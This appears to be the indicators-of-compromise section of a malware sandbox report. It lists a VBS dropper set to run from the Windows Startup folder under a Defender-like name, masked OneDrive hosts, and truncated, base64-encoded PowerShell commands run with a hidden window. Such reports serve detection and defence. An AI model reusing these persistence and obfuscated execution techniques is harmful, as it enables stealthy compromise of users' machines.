Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs
- %HOMEPATH%\pictures\cc.exe
- %HOMEPATH%\pictures\defender32.vbs
- 'on####ve.live.com':443
- 'h5####.#b.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK h5####.#b.files.1drv.com
- '%HOMEPATH%\pictures\cc.exe'
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Pictures\Defender32.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...